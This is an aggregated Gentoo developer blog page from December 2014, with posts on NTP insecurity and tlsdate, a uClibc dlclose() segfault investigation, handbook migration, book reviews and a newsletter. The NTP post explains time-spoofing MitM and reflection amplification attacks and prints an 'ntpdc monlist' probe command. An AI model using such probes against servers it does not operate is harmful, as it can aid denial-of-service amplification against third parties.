    • Members with experience from other registered associations are welcome too
    • The formal relocation of the association to Berlin is still not settled.
    • Too much guessing when it comes to e.V. formalities
  • The “Gentoo” trademark needs attention
    • Unification with the US trademark Gentoo? (see the thread by Sven Vermeulen)
    • Renewal, dissolution, or transfer of the EU trademark to the Gentoo Foundation?
  • More presence at trade fairs again (currently too few people with time)
  • Your exciting Gentoo project that needs a server, on our hardware?
  • Other fresh new ideas!

Please talk to us at 31c3 or get in touch by e-mail at vorstand at gentoo dash ev dot org.

December 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Don't update NTP – stop using it (December 19, 2014, 23:47 UTC)

tl;dr: Several severe vulnerabilities have been found in the time-setting software NTP. The Network Time Protocol is not secure anyway, due to the lack of a secure authentication mechanism. Better use tlsdate.

Today several severe vulnerabilities in the NTP software were published. On Linux and other Unix systems running the NTP daemon is widespread, so this will likely cause some havoc. I wanted to take this opportunity to argue that I think that NTP has to die.

In the old times, before we had the Internet, our computers already had an internal clock. It was just up to us to make sure it showed the correct time. These days we have something much more convenient – and less secure. We can set our clocks through the Internet from time servers. This is usually done with NTP.

NTP is pretty old, it was developed in the 80s, Wikipedia says it's one of the oldest Internet protocols in use. The standard NTP protocol has no cryptography (that wasn't really common in the 80s). Anyone can tamper with your NTP requests and send you a wrong time. Is this a problem? It turns out it is. Modern TLS connections increasingly rely on the system time as a part of security concepts. This includes certificate expiration, OCSP revocation checks, HSTS and HPKP. All of these have security considerations that in one way or another expect the time of your system to be correct.
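
To see how blindly a client trusts whatever comes back, you can query a server without touching your clock (the pool server below is only an example):

# -q queries without setting the clock; nothing in the reply is authenticated,
# so whoever can spoof this single UDP response controls the time you would set
ntpdate -q pool.ntp.org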

Practical attack against HSTS on Ubuntu

At the Black Hat Europe conference last October in Amsterdam there was a talk presenting a pretty neat attack against HSTS (the background paper is here, unfortunately there seems to be no video of the talk). HSTS is a protocol to prevent so-called SSL-Stripping-Attacks. What does that mean? In many cases a user goes to a web page without specifying the protocol, e. g. he might just type www.example.com in his browser or follow a link from another unencrypted page. To avoid attacks here a web page can signal the browser that it wants to be accessed exclusively through HTTPS for a defined amount of time. TLS security is just an example here, there are probably other security mechanisms that in some way rely on time.

Here's the catch: The defined amount of time depends on a correct time source. On some systems manipulating the time is as easy as running a man-in-the-middle attack on NTP. At the Black Hat talk a live attack against an Ubuntu system was presented, and the speaker also published his NTP MitM tool, called Delorean. Some systems don't allow arbitrary time jumps, so there the attack is not that easy. But the bottom line is: the system time can be important for application security, so it needs to be secure. NTP is not.

Now there is an authenticated version of NTP. It is rarely used, but there's another catch: it has been shown to be insecure and nobody has bothered to fix it yet. There is a pre-shared-key mode that is not completely insecure, but it is not really practical for widespread use. So authenticated NTP won't rescue us. The latest versions of Chrome show warnings in some situations when a highly implausible time is detected. That's a good move, but it's not a replacement for a secure system time.

There is another problem with NTP, and that's the fact that it uses UDP. It can be abused for reflection attacks. UDP has no way of checking that the sender address of a network packet is the real sender. Therefore one can abuse UDP services to amplify denial-of-service attacks if there are commands that produce a larger reply. It was found that NTP has such a command, called monlist, which has a large amplification factor, and it was widely enabled until recently. Amplification is also a big problem for DNS servers, but that's another topic.
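
For reference, the probe behind those reflection attacks was a single small query; ntp.example.com is just a placeholder here, and this should only be pointed at servers you operate:

# a few bytes out, a list of recent clients back; combined with a spoofed
# source address this made a cheap amplification attack (most servers have
# monlist restricted or disabled by now)
ntpdc -n -c monlist ntp.example.com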

tlsdate can improve security

While there is no secure dedicated time-setting protocol, there is an alternative: TLS. A TLS handshake contains a timestamp and that can be used to set your system time. This is kind of a hack: you're taking another protocol that happens to contain information about the time. But it works very well, and there's a tool called tlsdate together with a time-setting daemon tlsdated, written by Jacob Appelbaum.
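
The underlying idea can be illustrated with standard tools; note that tlsdate itself parses the timestamp out of the TLS handshake, while this rough sketch merely reads the HTTP Date header over an authenticated TLS connection, with the host picked only as an example:

# pull a timestamp over TLS with stock tools; a real implementation would also
# verify the certificate chain and then set the clock from the parsed value
printf 'HEAD / HTTP/1.1\r\nHost: www.ptb.de\r\nConnection: close\r\n\r\n' |
  openssl s_client -connect www.ptb.de:443 -quiet 2>/dev/null |
  grep -i '^date:'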

There are some potential problems to consider with tlsdate, but none of them is anywhere near as serious as the problems of NTP. Adam Langley mentions here that using TLS for time setting and verifying the TLS certificate with the current system time is a circularity. However this isn't a problem if the existing system time is at least remotely close to the real time. If using tlsdate gets widespread and people add random servers as their time source, strange things may happen. Just imagine server operator A thinks server B is a good time source and server operator B thinks server A is a good time source. Unlikely, but it could be a problem. tlsdate uses the PTB (Physikalisch-Technische Bundesanstalt) as its default time source; that's an organization running atomic clocks in Germany. I hope they set their server time from the atomic clocks, then everything is fine. Also an issue is that you're delegating your trust to a server operator. Depending on what your attack scenario is, that might be a problem. However, trusting one time source is a huge improvement over having a completely insecure time source.

So the conclusion is obvious: NTP is insecure, you shouldn't use it. You should use tlsdate instead. Operating systems should replace ntpd or other NTP-based solutions with tlsdated (ChromeOS already does).

(I should point out that the authentication problems have nothing to do with the current vulnerabilities. These are buffer overflows and this can happen in every piece of software. Tlsdate seems pretty secure, it uses seccomp to make exploitability harder. But of course tlsdate can have security vulnerabilities, too.)

Update: Accuracy and TLS 1.3

This blog entry got much more publicity than I expected, I'd like to add a few comments on some feedback I got.

A number of people mentioned the lack of accuracy provided by tlsdate. The TLS timestamp is in seconds; adding some network latency, you'll get a worst-case inaccuracy of around one second, certainly less than two seconds. I can see that this is a problem for some special cases, however it's probably safe to say that for most average use cases an inaccuracy of less than two seconds does not matter. I'd prefer if we had a protocol that is both safe and as accurate as possible, but we don't. I think choosing the secure one is the better default choice.

Then some people pointed out that the timestamp of TLS will likely be removed in TLS 1.3. From a TLS perspective this makes sense. There are already TLS users that randomize the timestamp to avoid leaking the system time (e. g. tor). One of the biggest problems in TLS is that it is too complex, so I think every change that removes unnecessary data is good.
For tlsdate this means very little in the short term. We're still struggling to get people to start using TLS 1.2. It will take a very long time until we can fully switch to TLS 1.3 (which will still take some time till it's ready). So for at least a couple of years tlsdate can be used with TLS 1.2.

I think both are valid points and they show that in the long term a better protocol would be desirable. Something like NTP, but with secure authentication. It should be possible to get both: Accuracy and security. With existing protocols and software we can only have either of these - and as said, I'd choose security by default.

I finally wanted to mention that the Linux Foundation is sponsoring some work to create a better NTP implementation and some code was just published. However it seems right now adding authentication to the NTP protocol is not part of their plans.

December 18, 2014
Michal Hrusecky a.k.a. miska (homepage, bugs)
Running for The Board (December 18, 2014, 00:04 UTC)

Hi everybody, openSUSE elections are just around the corner and I decided to step forward and run for the seat in The Board. For those who don’t know me and would like to know why consider me as an option, here is my platform.

Who am I?

I'm about 30 years old, live in Prague and I love openSUSE (and Gentoo ;-) ). SUSE 6.3 was my first Linux distribution, I went through some more, and I actively joined the openSUSE community more than six years ago. I worked for SUSE for five years as one of the openSUSE Boosters and as a package maintainer. I was also part of the Prague openSUSE Conference organization team. Nowadays I work for a company called Eaton (in its open source team), but I still love openSUSE, have plenty of friends in both SUSE and openSUSE, poke some packages from time to time and I'm spreading open source in general and openSUSE in particular wherever I go (we have a few openSUSE servers at work now, yay).

What I see as a role of board and what I would like to achieve there?

I see the role of the board as that of a supporter and caretaker. The board is here to do the boring stuff and to enable everybody else to make amazing things within the project: to encourage people to do new things, to smooth rough edges, remove obstacles, listen to the people and try to bring them together. Also, if needed, to defend the project from possible threats, but I don't see any on the horizon currently :-)

What would I like to achieve? World domination? Probably not, as I don't think that the board is here to choose a direction. But if you have a cunning and ethical plan for how to do that, I think the board should do everything possible to support you. On a more serious note, openSUSE as a distribution had a challenging year and went through some changes lately, and I believe that thanks to the current board we managed to get through it quite well. But I also think there are more challenges in front of us, and I would like to help make our future path as smooth as possible.

Why vote for me?

Why vote for me, especially if I don't promise pink ponies and conquering the world? Well, I promise that I will do my best to support you and to help the project move in whatever direction it wants. Even if it means pink ponies and conquering the world ;-) I always listen to others and I try to resolve everything peacefully. I'm almost always smiling and it's hard to piss me off. So, almost no matter what, I'll keep calm and patient and will try to resolve challenges peacefully and to the satisfaction of all interested parties.

December 16, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

I pushed out another version of Lilblue Linux a few days ago but I don’t feel as good about this release as previous ones.  If you haven’t been following my posts, Lilblue is a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  The name is a bit misleading because Lilblue is Gentoo but departs from the mainstream in this one respect only.  In fact, I strive to make it as close to mainstream Gentoo as possible so that everything will “just work”.  I’ve been maintaining Lilblue for years as a way of pushing the limits of uClibc, which is mainly intended for embedded systems, to see where it breaks and fix or improve it.

As with all releases, there are always a few minor problems, little annoyances that are not exactly show stoppers.  One minor oversight that I found after releasing was that I hadn't configured smplayer correctly.  That's the GUI front end to mplayer that you'll find on the toolbar at the bottom of the desktop. It works, just not out-of-the-box.  In the preferences, you need to switch from mplayer2 to mplayer and set the video out to x11.  I'll add that to the build scripts to make sure it's in the next release [1].  I've also been migrating away from gnome-centered applications, which have been pulling in more and more bloat.  A couple of releases ago I switched from gnome-terminal to xfce4-terminal, and for this release, I finally made the leap from epiphany to midori as the main browser.  I like midori better, although it isn't as popular as epiphany.  I hope others approve of the choice.

But there is one issue I hit which is serious.  It seems with every release I hit at least one of those.  This time it was in uClibc's implementation of dlclose().  Along with dlopen() and dlsym(), this is how shared objects can be loaded into a running program during execution rather than at load time.  This is probably more familiar to people as “plugins”, which are just shared objects loaded while the program is running.  When building the latest Lilblue image, gnome-base/librsvg segfaulted while running gdk-pixbuf-query-loaders [2].  The latter links against glib and calls g_module_open() and g_module_close() on many shared objects as it constructs a cache of loadable objects.  g_module_{open,close} are just glib's wrappers around dlopen() and dlclose() on systems that provide them, like Linux.  A preliminary backtrace obtained by running gdb on `/usr/bin/gdk-pixbuf-query-loaders ./libpixbufloader-svg.la` pointed to the segfault happening in gcc's __deregister_frame_info() in unwind-dw2-fde.c, which didn't sound right.  I rebuilt the entire system with CFLAGS+="-fno-omit-frame-pointer -O1 -ggdb" and turned on uClibc's SUPPORT_LD_DEBUG=y, which emits debugging info to stderr when running with LD_DEBUG=y, and DODEBUG=y, which prevents symbol stripping in uClibc's libraries.  A more complete backtrace gave:

Program received signal SIGSEGV, Segmentation fault.
__deregister_frame_info (begin=0x7ffff22d96e0) at /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c:222
222 /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c: No such file or directory.
(gdb) bt
#0 __deregister_frame_info (begin=0x7ffff22d96e0) at /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c:222
#1 0x00007ffff22c281e in __do_global_dtors_aux () from /lib/libbz2.so.1
#2 0x0000555555770da0 in ?? ()
#3 0x0000555555770da0 in ?? ()
#4 0x00007fffffffdde0 in ?? ()
#5 0x00007ffff22d8a2f in _fini () from /lib/libbz2.so.1
#6 0x00007fffffffdde0 in ?? ()
#7 0x00007ffff6f8018d in do_dlclose (vhandle=0x7ffff764a420 <__malloc_lock>, need_fini=32767) at ldso/libdl/libdl.c:860
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

The problem occurred when running the global destructors in dlclose()-ing libbz2.so.1.  Line 860 of libdl.c has DL_CALL_FUNC_AT_ADDR (dl_elf_fini, tpnt->loadaddr, (int (*)(void))); which is a macro that calls a function at address dl_elf_fini with signature int(*)(void).  If you’re not familiar with ctor’s and dtor’s, these are the global constructors/destructors whose code lives in the .ctor and .dtor sections of an ELF object which you see when doing readelf -S <obj>.  The ctors are run when a library is first linked or opened via dlopen() and similarly the dtors are run when dlclose()-ing.  Here’s some code to demonstrate this:

# Makefile
all: tmp.so test
tmp.o: tmp.c
        gcc -fPIC -c $^
tmp.so: tmp.o
        gcc -shared -Wl,-soname,$@ -o $@ $^
test: test-dlopen.c
        gcc -o $@ $^ -ldl
clean:
        rm -f *.so *.o test
// tmp.c
#include <stdio.h>

void my_init() __attribute__ ((constructor));
void my_fini() __attribute__ ((destructor));

void my_init() { printf("Global initialization!\n"); }
void my_fini() { printf("Global cleanup!\n"); }
void doit() { printf("Doing it!\n"); }
// test-dlopen.c
// This has very bad error handling, sacrificed for readability.
#include <stdio.h>
#include <dlfcn.h>

int main() {
        int (*mydoit)();
        void *handle = NULL;

        handle = dlopen("./tmp.so", RTLD_LAZY);
        mydoit = dlsym(handle, "doit");
        mydoit();
        dlclose(handle);

        return 0;
}

When run, this code gives:

# ./test 
Global initialization!
Doing it!
Global cleanup!

So, my_init() is run on dlopen() and my_fini() is run on dlclose().  Basically, upon dlopen()-ing a shared object as you would a plugin, the library is first mmap()-ed into the process’s address space using the PT_LOAD addresses which you can see with readelf -l <obj>.  Then, one walks through all the global constructors and runs them.  Upon dlclose()-ing the opposite process is done.  One first walks through the global destructors and runs them, and then one munmap()-s the same mappings.
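
For example, the PT_LOAD segments of the library that misbehaves here (path as in the backtrace above) can be listed with:

readelf -l /lib/libbz2.so.1 | grep LOAD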

Figuring I wasn’t the only person to see a problem here, I googled and found that Nathan Copa of Alpine Linux hit a similar problem [3] back when Alpine used to use uClibc — it now uses musl.  He identified a problematic commit and I wrote a patch which would retain the new behavior introduced by that commit upon setting an environment variable NEW_START, but would otherwise revert to the old behavior if NEW_START is unset.  I also added some extra diagnostics to LD_DEBUG to better see what was going on.  I’ll add my patch to a comment below, but the gist of it is that it toggles between the old and new way of calculating the size of the munmap()-ings by subtracting an end and start address.  The old behavior used a mapaddr for the start address that is totally wrong and basically causes every munmap()-ing to fail with EINVAL.  This is corrected by the commit as a simple strace -e trace=munmap shows.
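
To reproduce that observation, something along these lines (the same invocation as in the backtraces above) should do:

strace -f -e trace=munmap /usr/bin/gdk-pixbuf-query-loaders libpixbufloader-svg.la 2>&1 | grep munmap
# with the old start address every call shows up as munmap(...) = -1 EINVAL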

My results when running with LD_DEBUG=1 were interesting to say the least.  With the old behavior, the segfault was gone:

# LD_DEBUG=1 /usr/bin//gdk-pixbuf-query-loaders libpixbufloader-svg.la
...
do_dlclose():859: running dtors for library /lib/libbz2.so.1 at 0x7f26bcf39a26
do_dlclose():864: unmapping: /lib/libbz2.so.1
do_dlclose():869: before new start = 0xffffffffffffffff
do_dlclose():877: during new start = (nil), vaddr = (nil), type = 1
do_dlclose():877: during new start = (nil), vaddr = 0x219c90, type = 1
do_dlclose():881: after new start = (nil)
do_dlclose():987: new start = (nil)
do_dlclose():991: old start = 0x7f26bcf22000
do_dlclose():994: dlclose using old start
do_dlclose():998: end = 0x21b000
do_dlclose():1013: removing loaded_modules: /lib/libbz2.so.1
do_dlclose():1031: removing symbol_tables: /lib/libbz2.so.1
...

Of course, all of the munmap()-ings failed.  The dtors were run, but no shared object got unmapped.  When running the code with the correct value of start, I got:

# NEW_START=1 LD_DEBUG=1 /usr/bin//gdk-pixbuf-query-loaders libpixbufloader-svg.la
...
do_dlclose():859: running dtors for library /lib/libbz2.so.1 at 0x7f5df192ba26
Segmentation fault

What's interesting here is that the segfault occurs at DL_CALL_FUNC_AT_ADDR, which is before the munmap()-ing and so before any effect that the new value of start should have! This seems utterly mysterious until you realize that there is a whole series of dlopens/dlcloses as gdk-pixbuf-query-loaders does its job — I counted 40 in all!  This is as far as I've gotten narrowing down this mystery, but I suspect some previous munmap()-ing is breaking the dtors for libbz2.so.1, and when the call is made to that address, it's no longer valid, leading to the segfault.

Rich Felker, aka dalias, the developer of musl, made an interesting comment to me in IRC when I told him about this issue.  He said that the unmappings are dangerous and that musl actually doesn't do them.  For now, I've intentionally left the unmappings in uClibc's dlclose() “broken” in the latest release of Lilblue, so you can't hit this bug, but for the next release I'm going to look carefully at what glibc and musl do and try to get this fix upstream.  As I said when I started this post, I'm not totally happy with this release because I didn't nail the issue, I just implemented a workaround.  Any hints would be much appreciated!

[1] The build scripts can be found in the releng repository at git://git.overlays.gentoo.org/proj/releng.git under tools-uclibc/desktop.  The scripts begin with a hardened amd64 uclibc stage3 tarball (http://distfiles.gentoo.org/releases/amd64/autobuilds/current-stage3-amd64-uclibc-hardened/) and build up the desktop.

[2] The purpose of librsvg and gdk-pixbuf is not essential to the problem with dlclose(), but for completeness we state it here: librsvg is a library for rendering scalable vector graphics and gdk-pixbuf is an image loading library for gtk+.  gdk-pixbuf-query-loaders reads a libtool .la file and generates a cache of loadable shared objects to be consumed by gdk-pixbuf.

[3] See  http://lists.uclibc.org/pipermail/uclibc/2012-October/047059.html. He suggested that the following commit was doing evil things: http://git.uclibc.org/uClibc/commit/ldso?h=0.9.33&id=9b42da7d0558884e2a3cc9a8674ccfc752369610

December 15, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)

Yesterday I deleted all the remaining data on my old Nokia 6230i phone with the intent to give it away. It was my last feature phone (i. e. non-smartphone). My first feature phone was a 5130 in the late 90s. It made me think a bit about technology development.

I remember that at some point when I was a kid I asked myself if there are transportable phones. I was told they don't exist (which was not exactly true, but it's safe to say that they weren't widely available). Feature phones were nonexistent when I started to care about tech gadgets and today they're obsolete. (Some might argue that smartphones are the new mobile phones, but I don't think that's accurate. Essentially I think the name smartphone is misleading, because they are multi function devices where the phone functionality is just one – and hardly the most important one.)

I considered whether I should keep it in case my current smartphone breaks or gets lost, so I would have a quick replacement. However, I then thought it would probably not do much good and decided it can go away while there are still people who would want to use it (the point where I could sell it has already passed). The reason is that the phone functionality is probably one of the less important ones of my smartphone, and a feature phone wouldn't do much to help in case I lose it.

Of course feature phones are not the only tech gadgets that rose and became obsolete during my lifetime. CD-ROM drives, MP3 players, modems, … I recently saw a documentary called “80s greatest gadgets” (it seems to be on Youtube, but unfortunately not available depending on your geolocation). I found it striking that almost every device they mentioned can be replaced with a smartphone today.

Something I wondered was what my own expectations of tech development were in the past. Surprisingly I couldn't remember that many. I would really be interested in how I would've predicted tech development, let's say 10 or 15 years ago, and compare it to what really happened. The few things I can remember are that when I first heard about 3D printers I had high hopes (I haven't seen them come true so far) and that I always felt free software would become the norm (which in large parts it did, but certainly not in the way I expected). I'm pretty sure I didn't expect social media and I'm unsure about smartphones.

As I feel it's unfortunate that I don't remember what I had expected in the past, I thought I could write down some expectations now. I feel drone delivery will likely have an important impact in the upcoming years and push the area of online shopping to a whole new level. I expect the whole area that's today called the “sharing economy” to rise (and probably crash) in many more areas. And I think that at some point robot technology will probably enter our everyday life. Admittedly none of this is completely unexpected, but that's not the point.

If you have some interesting thoughts what tech we'll see in the upcoming years feel free to leave a comment.

Image from Rudolf Stricker / Wikimedia Commons

Sebastian Pipping a.k.a. sping (homepage, bugs)

Julian Treasure: How to speak so that people want to listen

December 14, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Handbooks moved (December 14, 2014, 12:42 UTC)

Yesterday the move of the Gentoo handbooks (whose most important part is the installation instructions for the various supported architectures) to the Gentoo Wiki was concluded, with a last-minute addition being the one-page views, so that users who want to can view the installation instructions completely within one view.

Because we use lots of transclusions (i.e. including different wiki articles inside another article) to support a common documentation base for the various architectures, I did hit a limit that prevented me from creating a single page for the entire handbook (i.e. “Installing Gentoo Linux”, “Working with Gentoo”, “Working with portage” and “Network configuration” together), but I could settle for one page per part. I think that matches most of the use cases.

With the move now done, it is time to start tackling the various bugs that were reported against the handbook, as well as initiate improvements where needed.

I did make a mistake in the move though (probably more than one, but this is the one fresh in my memory). I had to do a lot of the following:

<noinclude><translate></noinclude>
...
<noinclude></translate></noinclude>

Without this, transcluded parts would suddenly show the translation tags as regular text. Only afterwards (I’m talking about more than 400 different pages) did I read that I should transclude the /en pages (like Handbook:Parts/Installation/About/en instead of Handbook:Parts/Installation/About) as those do not have the translation specifics in them. Sigh.
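
A minimal sketch of the difference, assuming standard MediaWiki transclusion syntax:

{{Handbook:Parts/Installation/About}}     <!-- pulls in the <translate> markers -->
{{Handbook:Parts/Installation/About/en}}  <!-- the /en page already has them stripped -->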

December 13, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
A short list of fiction books I enjoyed (December 13, 2014, 16:18 UTC)

I promised in the previous review a few more reviews for the month, especially as Christmas gifts for geeks. I decided to publish this group-review of titles, as I don't think it would have served anybody to post separate book reviews for all of these. I would also suggest you take a look at my previous reviews so that you can find more ideas for new books to read.

Let's start with a new book by a well-known author: The Ocean at the End of the Lane by Neil Gaiman is, as it's usual with him, difficult to nail (ah-ha) to a genre quickly. It starts off as the story of a kid's youth but builds up to… quite something. I have listened to the audiobook version rather than the book, and as it started it seemed something perfect to make me sleep well, but then again it mixed with my own dreams to form something at the same time scary and full of warmth.

It's common to say that it's the journey, not the destination, that is important, and I find that a very good description of what I like in books. And in the case of Gaiman's book, this is more true than ever. I was not looking forward to it ending, not because it's a bad ending (even though it did upset me a bit) but because I really wanted to stay in that magical world of the Ocean at the end of the lane.

Next up, two series from an author who's also a friend: Michael McCloskey, who writes both fantasy and scifi — I have yet to start on his fantasy series, but I fell in love with his scifi writing with Trilisk Ruins. I think it might be worth retelling the story of how I found out about it, even though it is a bit embarrassing: for a while I was a user on OkCupid – so sue me, it feels lonely sometimes – and while I did not end up meeting anybody out of there, my interest was piqued by an ad on one of the pages: it was part of the cover of Trilisk Ruins but with no text on it. I thought it was going to be some kind of game, instead it was a much more intriguing book.

Michael's secret is in talking about a future that may be far off, but that is, well, feasible. It's not the dystopia painted by most scifi books I've read or skimmed through recently, although it's not a perfect future — it is, after all, the same as now. And technology is not just thrown in from a future so far away that we can count on it as magic, nor is it just an extension of today's. It is a projection of it into the future: the Links are technologies that, while not existing now, and not having a clearly-defined path to get to them, wouldn't be too far-fetched to exist.

Parker Interstellar Travels – that's the name of the series starting with Trilisk Ruins – is mostly lighthearted, even though dark at times. It reads quickly, once you get past the first chapter or two, as it jumps straight into an unknown world, so you may be stunned by it for a moment. But I would suggest you brace yourself and keep going; it's fully worth it!

There is a second series by Michael, but in this case an already-closed trilogy, Synchronicity, starting with Insidious, which is set in the same universe and future, but it takes a quite different approach: it's definitely darker and edgier, and it would appeal to many of the geeks who are, as I write, busy reading and discussing potential AI problems. I have a feeling that it would have been similar in the '60s-'70s after 2001 was released.

In this series, the focus is more on the military, rather than on individuals, and on their use, and fear, of AIs. As I noted it is darker, and it's less action-driven than PIT, but it does make up for it in introspection, so depending on what your cup of tea is, you may choose between the two.

The fourth entry in this collection is something that arrived through Samsung's Amazon deals. Interestingly I already had an audiobook by the same author – B.V. Larson – through some Audible giveaway but I have not listened to it yet. Instead I read Technomancer in just a week or so, and it was quite interesting.

Rather than future, Larson goes for current time, but in a quite fictionalized setting. There's a bit of cliché painting of not one, but two women in the book, but it does not seem to be as endemic as in other books I've read recently. It's a quick-bite read but it's also the start of a series so if you're looking for something that does not end right away you may consider it.

To finish this up, I'll go back to an author that I reviewed before: Nick Harkaway, already the author of The Gone-Away World, which is still one of my favourite modern books. While I have not yet read Tigerman, which was on this year's shortlist for the Goodreads Awards, last year I read Angelmaker, which is in a lot of ways similar to The Gone-Away World, but different. His characters once again are fully built up even when they are cows, and the story makes you want to dive into that world, flawed and sometimes scary as it is.

Have fun, and good reads this holiday season!

December 12, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Handbooks almost moved to wiki (December 12, 2014, 15:35 UTC)

Content-wise, the move is done. I’ve done a few checks on the content to see if the structure still holds, translations are enabled on all pages, the use of partitions is sufficiently consistent for each architecture, and so on. The result can be seen on the gentoo handbook main page, from which the various architectural handbooks are linked.

I sent a sort-of announcement to the gentoo-project mailing list (which also includes the motivation for the move). If there are no objections, I will update the current handbooks to link to the wiki ones, as well as update the links on the website (and in wiki articles) to point to the wiki.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Gentoo mailing lists down (December 12, 2014, 00:09 UTC)

Since yesterday the host running all Gentoo mailing lists has been down. So far no information is available on the nature of the problem. Please check the Gentoo Infrastructure status page, http://infra-status.gentoo.org/, for updates.

[Edit: All fixed.]

This public service announcement has been brought to you by non-infra Andreas.

December 11, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Book Review: Getting More (December 11, 2014, 21:19 UTC)

It has been a while since I wrote my last book review and it was not exactly a great one, so I'll try to improve on this by writing a few reviews over the next month or so. After all what better gift for geeks than books?

I have had the pleasure of reading Getting More last October, as part of a work training. It's a book about negotiation, and it makes a point multiple times of detaching that from the idea of manipulation, even though it's probably up to you to see whether the distinction is clear enough for you. The author, Prof. Stuart Diamond, runs a negotiation course at Wharton, in Pennsylvania, and became famous with it.

I was expecting the book to be hogwash, like many other business books, and especially so as many materials I've been given before at courses (before my current job, though). It turned out that the book is not bad at all and I actually found it enjoyable, even though a bit repetitive — but repetita iuvant as they say; the repetition is there to make you see the point, not just for the sake of being there.

The main objective of the book is to provide you with a process and tools to use during negotiation, big-time business deals and everyday transactions alike. It also includes examples of how to use this with your significant other and children, but I'll admit I just skipped over them altogether as they are not useful to me (I'm single and I don't even see my nephew enough to care about dealing with children.)

It was a very interesting read to me because, while I knew I'm not exactly a cold-minded person especially when frustrated, I found that some of the tools described I've been using, for a long time, without even knowing about their existence. For example, when I interviewed for my current job, my first on-site interviewer arrived with a NERV sticker on his laptop — we spent a few minutes talking about anime, and not only did that reassure me a lot about the day – you have no idea how stressed I was, as I even caught a fever the day before the interview! – it also built an "instantaneous" connection with someone who did indeed become a colleague. I would think it might have added to his patience for my thicker-than-usual accent that day, too.

Between anecdotes and explanations, the book has another underlying theme: be real. This is the main point of difference between negotiation and manipulation as seen by the book. In the more mundane case of dealing with stores, hotels and airlines, you have two main examples of using the techniques: to get compensated for something negative that happened, whether or not it was in the control of the other party, and to ask for penalties to be waived when you did something incorrect, unintentionally. It would be tempting to cause something negative and ask for compensation even if everything was perfect — but that would be manipulation, and it's unlikely to work very well unless you're a good -actor- liar, and it rather makes things worse for the rest of the world.

The book invites you to keep exercising the tools daily — I have been trying, but it's definitely not easy, especially if you're not an extrovert by nature. It takes practice and, especially at the beginning, more time than it would be worth: arguing half an hour for a fifteen euro discount somewhere is not really worth it to me, but on the other hand practice makes perfect, and the process to apply is the same for small and big transactions. I have indeed been able to get some ~$100 back at the Holiday Inn I've stayed at in San Francisco.

I have got my set of reservations about using the methods described in the book – it sometimes feels manipulative and reliant on implicit privilege – but on the other hand, Prof. Diamond points out multiple times that the methods work best when both parties know about them, so spreading the word about the book is a good idea, and telling people explicitly what you're doing is the best strategy.

Indeed, I felt that I would have gotten better treatment from Tesco just last week, if they had read the book and applied the same methods. A delivery was missed, and that was fine, but then the store went incommunicado for over ten hours instead of calling me right away to reschedule, and the guy who eventually called me lied about the order going out anew the day after. They gave me some €25 back straight on the card — which is okay for me, but it was not really in their best interest, as I could have walked away with the money and gone to a different store. I asked them if they could offer me some months of their DeliverySaver (think Amazon Prime for groceries) for free.

Yes, the DeliverySaver subscription would have had a much higher value (€7.5/month), but it would actually have been cheaper for them (as I live in an apartment complex that they deliver to daily anyway, the delivery costs are much lower than that), and it would have "forced" me to come back to them, rather than going to a competitor such as SuperValu. As it turns out, I've decided to stick with Tesco, mostly because I have their credit card and it is thus still convenient to stay a customer. But I do think they could have made a better deal for themselves.

At any rate, the book is worth a read and the techniques are not completely worthless, even though difficult to pull off without being a jerk. It requires knowing a lot about a system to do so, but again this is something that is up to the people reading the book.

December 10, 2014
Gentoo Monthly Newsletter: November 2014 (December 10, 2014, 20:00 UTC)

Gentoo News

Council News

The Gentoo Council addressed a few miscellaneous matters this month.

The first concerned tinderbox reports to bugs. There was a bit of a back-and-forth in bugzilla with a  dispute over whether bugs generated from tinderbox runs that contained logs attached as URLs instead of as files could be closed as INVALID. Normally the use of URLs is discouraged to improve the long-term usability of the bugs. Since efforts were already underway to try to automatically convert linked logs into attached logs it was felt that closing bugs as INVALID was counterproductive.

There was also a proposal to implement a “future.eclass” which would make EAPI6 features available to EAPI5 ebuilds early. In general the Council decided that this was not a good thing to implement in the main tree as it would mean supporting two different implementations of some of the EAPI6 features, which could potentially diverge and cause confusion. Instead it would be preferable to focus on migrating packages to use EAPI6. The Council did encourage using mechanisms like this to do testing in overlays/etc if it was for the purpose of improving future EAPIs, but that this shouldn’t be something done in “production.”

Several other items came up with no action this month. There was a proposal to allow die within subshells in EAPI6, but this had not received list discussion, and the Council has been requiring this to ensure that all developers are able to properly vet significant changes. The remaining items were follow-ups from previous months which are being tracked but which have not had enough development to act on yet.

Gentoo Developer Moves

Summary

Gentoo is made up of 244 active developers, of which 40 are currently away.
Gentoo has recruited a total of 805 developers since its inception.

Changes

  • Matthias Maier (tamiko) joined the Science team
  • Andrew Savchenko (bircoph) joined the Science, Mathematics and Physics team
  • Jason Zaman (perfinion) joined the Hardened, Integrity and SElinux teams
  • Aaron Swenson (titanofold) joined the Perl team
  • Patrice Clement (monsieurp) joined the Perl team
  • Tom Wijsman (tomwij) left the bug-wranglers, dotnet, kernel, portage, QA and proxy-maintainers teams

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 163
Packages 17849
Ebuilds 37661
Architecture Stable Testing Total % of Packages
alpha 3536 674 4210 23.59%
amd64 10838 6521 17359 97.25%
amd64-fbsd 0 1584 1584 8.87%
arm 2642 1848 4490 25.16%
arm64 549 64 613 3.43%
hppa 3076 529 3605 20.20%
ia64 3093 697 3790 21.23%
m68k 605 118 723 4.05%
mips 0 2422 2422 13.57%
ppc 6741 2549 9290 52.05%
ppc64 4295 1048 5343 29.93%
s390 1410 404 1814 10.16%
sh 1537 524 2061 11.55%
sparc 4033 980 5013 28.09%
sparc-fbsd 0 319 319 1.79%
x86 11483 5448 16931 94.86%
x86-fbsd 0 3205 3205 17.96%

[Chart: Portage statistics (gmn-portage-stats-2014-12)]

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
